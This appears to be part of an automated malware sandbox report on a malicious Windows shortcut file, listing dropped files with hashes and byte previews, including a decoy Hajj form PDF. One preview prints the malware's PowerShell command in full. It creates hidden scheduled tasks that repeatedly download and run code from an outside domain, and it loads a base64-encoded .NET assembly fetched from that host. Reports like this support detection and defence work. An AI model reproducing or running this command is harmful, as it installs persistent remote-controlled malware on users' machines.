                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F.@.. ...$+.,....y`..Y...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I>YE.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V>YE.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V>YE.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V>YE............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V>YG............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............\......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 30 15:58:12 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2679
                                                                                                                                          Entropy (8bit):3.991962367749216
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:8QdQTUsMHxidAKZdA1weh/iZUkAQkqehUy+2:8Pvk9Qpy
                                                                                                                                          MD5:73014025CE0CBAA48E6FFFA23072F0E1
                                                                                                                                          SHA1:4C2A7F49430B775B5EEE8FE60AF9ABA244EF977A
                                                                                                                                          SHA-256:6C0BEA4EE2667EA8A426039669B64D47DD0B0612FB2532242AD3B2EDB5FC314E
                                                                                                                                          SHA-512:383EFB8FD335DA98D8622C8577CC4C2A9E495D736FC82C9CE4059FACFEDDF93370AB5C8E1FB09267AFB58A38B9A83480D85D231809D3918AB303584FA48D3CBF
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F.@.. ...$+.,......~.Y...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I>YE.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V>YE.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V>YE.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V>YE............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V>YG............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............\......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2693
                                                                                                                                          Entropy (8bit):4.004539700315937
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:8xddQTUssHxidAKZdA14tseh7sFiZUkmgqeh7siy+BX:8xgv8noy
                                                                                                                                          MD5:2046815C8F26DA85D1E6F959003FF74C
                                                                                                                                          SHA1:9502E15018CDBB0A01C5096541F732A3FD8DA734
                                                                                                                                          SHA-256:5DC21C3F31D282F6C9B73CE6387091E14C6D8AD182166A25A0C35D9353B67BD8
                                                                                                                                          SHA-512:63059B27D20885C8C7335D65E08981385C5CE5348DE1B6D07B138787FB8DAE992E2A91CBCA6FEE3C9F2618DDB7699B553D8720B2830E0472B79C5401EDDC29B4
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I>YE.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V>YE.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V>YE.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V>YE............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............\......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 30 15:58:12 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2681
                                                                                                                                          Entropy (8bit):3.9890104254039493
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:8XRdQTUsMHxidAKZdA1vehDiZUkwqehgy+R:8Xsvvay
                                                                                                                                          MD5:543E78C3B5E9EA2C75ED2F59513BAEB5
                                                                                                                                          SHA1:FBCF361A3B1632EF94416295B1D13146DAE1F2B6
                                                                                                                                          SHA-256:EA0E32FE6352CF3DC147CB2EDE1CD694CD371B4D49EB9D1A891EC93F3EC39FC1
                                                                                                                                          SHA-512:B945E91AA2F644CECAF224578256C09C9E3088DEF045E689FE33236A567DD6D704635320DB820393EC3E4472CD58D14217425B5CA8E579897598B63B92556C4C
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F.@.. ...$+.,......t.Y...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I>YE.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V>YE.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V>YE.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V>YE............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V>YG............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............\......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 30 15:58:12 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2681
                                                                                                                                          Entropy (8bit):3.9806758129173545
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:8HdQTUsMHxidAKZdA1hehBiZUk1W1qehmy+C:8SvP9Gy
                                                                                                                                          MD5:D7194288AC5B1BB49452AC17ABFDC5D3
                                                                                                                                          SHA1:77AFEEF717F61A301BD84D9F99612877C03EEBDA
                                                                                                                                          SHA-256:48997E66BD4F2481AFE20BDD7DB85514239E554D2222E561F10145AC75831E76
                                                                                                                                          SHA-512:129A11416872C4F737FBD259A930C397C9E1334A4659E01FB2EC18079FA44B668AA2CC62E229B7CC999944B5458DE18D8B6443CE1BCB7D2C2ED4F1527EDA93B4
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F.@.. ...$+.,........Y...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I>YE.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V>YE.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V>YE.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V>YE............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V>YG............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............\......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 30 15:58:12 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2683
                                                                                                                                          Entropy (8bit):3.9880372890722673
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:8vdQTUsMHxidAKZdA1duT+ehOuTbbiZUk5OjqehOuTboy+yT+:8qvHT/TbxWOvTboy7T
                                                                                                                                          MD5:9486399A8B1687E0F799E290456C2BA5
                                                                                                                                          SHA1:EB029DBAE38134060D279AFDC4BED9F45DF08292
                                                                                                                                          SHA-256:30594F024AB324CC5288727CBDED362B4CAA14234929C02C4F2907D947BF71CB
                                                                                                                                          SHA-512:481C8A8EBF6563081AF82E545303A9240FB95AFA11F39987BFFC5910693FB941478D6636FEA577B460E2AF78D7CD5605524111FFA08E8EA411C28A410CFAD9E5
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F.@.. ...$+.,......g.Y...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I>YE.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V>YE.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V>YE.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V>YE............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V>YG............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............\......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                          C:\Users\user\Downloads\6471059a-8090-4a9a-bead-41debf20281d.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:PDF document, version 1.7 (zip deflate encoded)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1024
                                                                                                                                          Entropy (8bit):7.307823308697814
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:+4S71RfxKBjEI2eQm/uGA7vSQM1ng7agsYnxse+T:+4S79cjE9eQm/udzSQFbsYxseU
                                                                                                                                          MD5:263BDE3FB2A544CA77A3135E14C4850A
                                                                                                                                          SHA1:F85130F69C04245C8AB1FFC4DAB4B142C5A55492
                                                                                                                                          SHA-256:602E35C3F58BA4610F33A23C7C6BC3942A73F4F415F17A9DBC1C316E460EA59A
                                                                                                                                          SHA-512:BD6C4E1C39B502F1313B70EB1B7516C883C0FDCFFD953B4E982D53C3279122A0995A682AEC2CF571394A7EB96D94924E1A1D2F96F8AD3A843B979ADD2A6E5372
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:%PDF-1.7.%......236 0 obj.<</Filter/FlateDecode/First 9/Length 251/N 2/Type/ObjStm>>stream..h.t....0.._e..$...Pr.]=.../.x.m..]#1...;F.........3..R.;8.Y.>.`..>6).U......|.Q.....a....e..'77<.........Ox....ni<u..}*;.....g<....%.(...i.A....a.g._......AJ..9.:...*.. V...._TN[.......Q.n.D.... .0.......mhXy.Ym........J/...4..~.....J..0.v[m...endstream.endobj.237 0 obj.<</Filter/FlateDecode/First 16/Length 138/N 3/Type/ObjStm>>stream..h.P0P.T06W05U04.T...w./.+Q0.w.,*..J.(...$.... ...P.Kjq.................~..% .@:...R..X.9!.%9. ..........@.8.1.........2....i.4. ..q|7...endstream.endobj.238 0 obj.<</Filter/FlateDecode/First 30/Length 208/N 4/Type/ObjStm>>stream..h.t.K..0......^..U(..<......5.Tj....#..{Xf.0...#C...B..(...P.R.s.=^..%._...!#,.'lE..:..g8.c.........T.i.....4&....pd...)qq*uPr*.I..._.....P@....N...N...c.zx..C...4.........8........-..2.A.:........bk...endstream.endobj.239 0 obj.<</Filter/FlateDecode/First 33/Length 261/N 5/Type/ObjStm>>stream..h..]k.0...{....R.km

                                                                                                                                          C:\Users\user\Downloads\downloaded.pdf (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:PDF document, version 1.7 (zip deflate encoded)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):891955
                                                                                                                                          Entropy (8bit):7.996703287304892
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:24576:SSSgPS+tLZMiOqibD0h4s2d1U5G0xQcSV:LHP3tXifSwiv2
                                                                                                                                          MD5:196653CFA44FEF5A41C6A2F9CB033A72
                                                                                                                                          SHA1:5B2817C77AFE7C89CC8B5B24941FAE00EA6B8E17
                                                                                                                                          SHA-256:55C847593AD141CC2AADFEDFCA6B36DB911FCB3B1C232A6C452B50F59DC32EDC
                                                                                                                                          SHA-512:7B0AA334767997F6A610088E17CDC6F34EE40EFFB8DFE6F61D78009496C22520B7BC633EAC8B8F005FCD7046F45449D2F0DCC6124F285A5808DD955DB0D3F8B2
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:%PDF-1.7.%......236 0 obj.<</Filter/FlateDecode/First 9/Length 251/N 2/Type/ObjStm>>stream..h.t....0.._e..$...Pr.]=.../.x.m..]#1...;F.........3..R.;8.Y.>.`..>6).U......|.Q.....a....e..'77<.........Ox....ni<u..}*;.....g<....%.(...i.A....a.g._......AJ..9.:...*.. V...._TN[.......Q.n.D.... .0.......mhXy.Ym........J/...4..~.....J..0.v[m...endstream.endobj.237 0 obj.<</Filter/FlateDecode/First 16/Length 138/N 3/Type/ObjStm>>stream..h.P0P.T06W05U04.T...w./.+Q0.w.,*..J.(...$.... ...P.Kjq.................~..% .@:...R..X.9!.%9. ..........@.8.1.........2....i.4. ..q|7...endstream.endobj.238 0 obj.<</Filter/FlateDecode/First 30/Length 208/N 4/Type/ObjStm>>stream..h.t.K..0......^..U(..<......5.Tj....#..{Xf.0...#C...B..(...P.R.s.=^..%._...!#,.'lE..:..g8.c.........T.i.....4&....pd...)qq*uPr*.I..._.....P@....N...N...c.zx..C...4.........8........-..2.A.:........bk...endstream.endobj.239 0 obj.<</Filter/FlateDecode/First 33/Length 261/N 5/Type/ObjStm>>stream..h..]k.0...{....R.km

                                                                                                                                          C:\Users\user\Downloads\downloaded.pdf.crdownload

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:PDF document, version 1.7 (zip deflate encoded)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):891955
                                                                                                                                          Entropy (8bit):7.996703287304892
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:24576:SSSgPS+tLZMiOqibD0h4s2d1U5G0xQcSV:LHP3tXifSwiv2
                                                                                                                                          MD5:196653CFA44FEF5A41C6A2F9CB033A72
                                                                                                                                          SHA1:5B2817C77AFE7C89CC8B5B24941FAE00EA6B8E17
                                                                                                                                          SHA-256:55C847593AD141CC2AADFEDFCA6B36DB911FCB3B1C232A6C452B50F59DC32EDC
                                                                                                                                          SHA-512:7B0AA334767997F6A610088E17CDC6F34EE40EFFB8DFE6F61D78009496C22520B7BC633EAC8B8F005FCD7046F45449D2F0DCC6124F285A5808DD955DB0D3F8B2
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:%PDF-1.7.%......236 0 obj.<</Filter/FlateDecode/First 9/Length 251/N 2/Type/ObjStm>>stream..h.t....0.._e..$...Pr.]=.../.x.m..]#1...;F.........3..R.;8.Y.>.`..>6).U......|.Q.....a....e..'77<.........Ox....ni<u..}*;.....g<....%.(...i.A....a.g._......AJ..9.:...*.. V...._TN[.......Q.n.D.... .0.......mhXy.Ym........J/...4..~.....J..0.v[m...endstream.endobj.237 0 obj.<</Filter/FlateDecode/First 16/Length 138/N 3/Type/ObjStm>>stream..h.P0P.T06W05U04.T...w./.+Q0.w.,*..J.(...$.... ...P.Kjq.................~..% .@:...R..X.9!.%9. ..........@.8.1.........2....i.4. ..q|7...endstream.endobj.238 0 obj.<</Filter/FlateDecode/First 30/Length 208/N 4/Type/ObjStm>>stream..h.t.K..0......^..U(..<......5.Tj....#..{Xf.0...#C...B..(...P.R.s.=^..%._...!#,.'lE..:..g8.c.........T.i.....4&....pd...)qq*uPr*.I..._.....P@....N...N...c.zx..C...4.........8........-..2.A.:........bk...endstream.endobj.239 0 obj.<</Filter/FlateDecode/First 33/Length 261/N 5/Type/ObjStm>>stream..h..]k.0...{....R.km

                                                                                                                                          C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):55
                                                                                                                                          Entropy (8bit):4.306461250274409
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                          Chrome Cache Entry: 101

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:MS Windows icon resource - 4 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):32038
                                                                                                                                          Entropy (8bit):5.104352236785294
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:9FMKxxje8gZryMDXe3ibKSo3MdXA1SPrQHg4M:bpr68gVy1i2SzdXA1wrQHg4M
                                                                                                                                          MD5:4859E39AE6C0F1F428F2126A6BB32BD9
                                                                                                                                          SHA1:1C0C85678AE963BC96D0B7FBE1EB89074CF1FBE0
                                                                                                                                          SHA-256:A94F8A8553CAEA8430DD4CA3CC01D4E318D19828F74CB65453FFB7F5D9E2F44D
                                                                                                                                          SHA-512:97541B40D8BEAC0DD8831EF8D2814EFEF10CFB185DF316E05B4F3AEF0A2D1839FB7A39D90F141F490E21B2955C32DF9D690785CC4DEF97CDFCE21ACF9BBAA2C7
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:............ .h...F... .... .........00.... ..%..V...@@.... .(B...:..(....... ..... .....@................................................................................................................................................u..L..n......................................................x..V..m......................................................{..X..n.........................................................\..q........................................................a..u........................................................d..x................................................S.......i..{................................................E.......q...................................................E.......o...................................................E.......q...................................................E.......u...................................................C........................................................

                                                                                                                                          Chrome Cache Entry: 102

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:MS Windows icon resource - 4 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):32038
                                                                                                                                          Entropy (8bit):5.104352236785294
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:9FMKxxje8gZryMDXe3ibKSo3MdXA1SPrQHg4M:bpr68gVy1i2SzdXA1wrQHg4M
                                                                                                                                          MD5:4859E39AE6C0F1F428F2126A6BB32BD9
                                                                                                                                          SHA1:1C0C85678AE963BC96D0B7FBE1EB89074CF1FBE0
                                                                                                                                          SHA-256:A94F8A8553CAEA8430DD4CA3CC01D4E318D19828F74CB65453FFB7F5D9E2F44D
                                                                                                                                          SHA-512:97541B40D8BEAC0DD8831EF8D2814EFEF10CFB185DF316E05B4F3AEF0A2D1839FB7A39D90F141F490E21B2955C32DF9D690785CC4DEF97CDFCE21ACF9BBAA2C7
                                                                                                                                          Malicious:false
                                                                                                                                          URL:https://mora.gov.pk/favicon.ico
                                                                                                                                          Preview:............ .h...F... .... .........00.... ..%..V...@@.... .(B...:..(....... ..... .....@................................................................................................................................................u..L..n......................................................x..V..m......................................................{..X..n.........................................................\..q........................................................a..u........................................................d..x................................................S.......i..{................................................E.......q...................................................E.......o...................................................E.......q...................................................E.......u...................................................C........................................................

                                                                                                                                          Chrome Cache Entry: 103

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:PDF document, version 1.7 (zip deflate encoded)
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):891955
                                                                                                                                          Entropy (8bit):7.996703287304892
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:24576:SSSgPS+tLZMiOqibD0h4s2d1U5G0xQcSV:LHP3tXifSwiv2
                                                                                                                                          MD5:196653CFA44FEF5A41C6A2F9CB033A72
                                                                                                                                          SHA1:5B2817C77AFE7C89CC8B5B24941FAE00EA6B8E17
                                                                                                                                          SHA-256:55C847593AD141CC2AADFEDFCA6B36DB911FCB3B1C232A6C452B50F59DC32EDC
                                                                                                                                          SHA-512:7B0AA334767997F6A610088E17CDC6F34EE40EFFB8DFE6F61D78009496C22520B7BC633EAC8B8F005FCD7046F45449D2F0DCC6124F285A5808DD955DB0D3F8B2
                                                                                                                                          Malicious:false
                                                                                                                                          URL:https://mora.gov.pk/SiteImage/Misc/files/HajjForm2024.pdf
                                                                                                                                          Preview:%PDF-1.7.%......236 0 obj.<</Filter/FlateDecode/First 9/Length 251/N 2/Type/ObjStm>>stream..h.t....0.._e..$...Pr.]=.../.x.m..]#1...;F.........3..R.;8.Y.>.`..>6).U......|.Q.....a....e..'77<.........Ox....ni<u..}*;.....g<....%.(...i.A....a.g._......AJ..9.:...*.. V...._TN[.......Q.n.D.... .0.......mhXy.Ym........J/...4..~.....J..0.v[m...endstream.endobj.237 0 obj.<</Filter/FlateDecode/First 16/Length 138/N 3/Type/ObjStm>>stream..h.P0P.T06W05U04.T...w./.+Q0.w.,*..J.(...$.... ...P.Kjq.................~..% .@:...R..X.9!.%9. ..........@.8.1.........2....i.4. ..q|7...endstream.endobj.238 0 obj.<</Filter/FlateDecode/First 30/Length 208/N 4/Type/ObjStm>>stream..h.t.K..0......^..U(..<......5.Tj....#..{Xf.0...#C...B..(...P.R.s.=^..%._...!#,.'lE..:..g8.c.........T.i.....4&....pd...)qq*uPr*.I..._.....P@....N...N...c.zx..C...4.........8........-..2.A.:........bk...endstream.endobj.239 0 obj.<</Filter/FlateDecode/First 33/Length 261/N 5/Type/ObjStm>>stream..h..]k.0...{....R.km

                                                                                                                                          \Device\ConDrv

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with very long lines (710), with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):712
                                                                                                                                          Entropy (8bit):4.973302992469686
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:ZuschdNjcA9nFvBKYs2NYssvNjcA9nFvBKYsEWNYsJuCNjcA9nFvBKYsWRgy2XIU:ZudhdiAlFoqNY7iAlFogWNY3CiAlFoSa
                                                                                                                                          MD5:238417DBBA84AD06B1FA4686D9ABEDE8
                                                                                                                                          SHA1:F6A8C17B5DA5E3FD8E25E078D8C7AEEE2514BD9F
                                                                                                                                          SHA-256:344A516275C667A7D02D81C15AE7BB25CE3F2520F57E9479CCE579F2B8E89839
                                                                                                                                          SHA-512:A5EF078ECF84282CB3596EE8BACC7FBAD9A2299D3F2927B06ED77B8023EEF4108FCF076ECFE4A0745B1F85A3DDADE52C7B6A2A6CD63CED758D08D3E2181B2015
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:schtasks /create /tn "CleanerRes" /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 09:00 /f ; schtasks /create /tn "DriversUpdate" /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 11:00 /f ; schtasks /create /tn "ZGraphics" /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 14:00 /f;$string = irm ('http://drive.desktopserver.top/file/res/'); $bytees = [System.Convert]::FromBase64String($string.Replace('^','')); [System.Reflection.Assembly]::Load($bytees);$Adobe = New-Object DSC.Sign; $Adobe.Connect('UpdateMe');..

                                                                                                                                          Static File Info

                                                                                                                                          General

                                                                                                                                          File type:MS Windows shortcut, Item id list present, Has Description string, Has command line arguments, Icon number=0, ctime=Wed Sep 25 05:12:08 2024, mtime=Wed Sep 25 05:12:08 2024, atime=Wed Sep 25 05:12:08 2024, length=0, window=hidenormalshowminimized
                                                                                                                                          Entropy (8bit):3.972739708853523
                                                                                                                                          TrID:
                                                                                                                                          • Windows Shortcut (20020/1) 100.00%
                                                                                                                                          File name:Sv6eQZzG0Z.lnk
                                                                                                                                          File size:713 bytes
                                                                                                                                          MD5:a22f05d003da4d6114cf3de35cc3c034
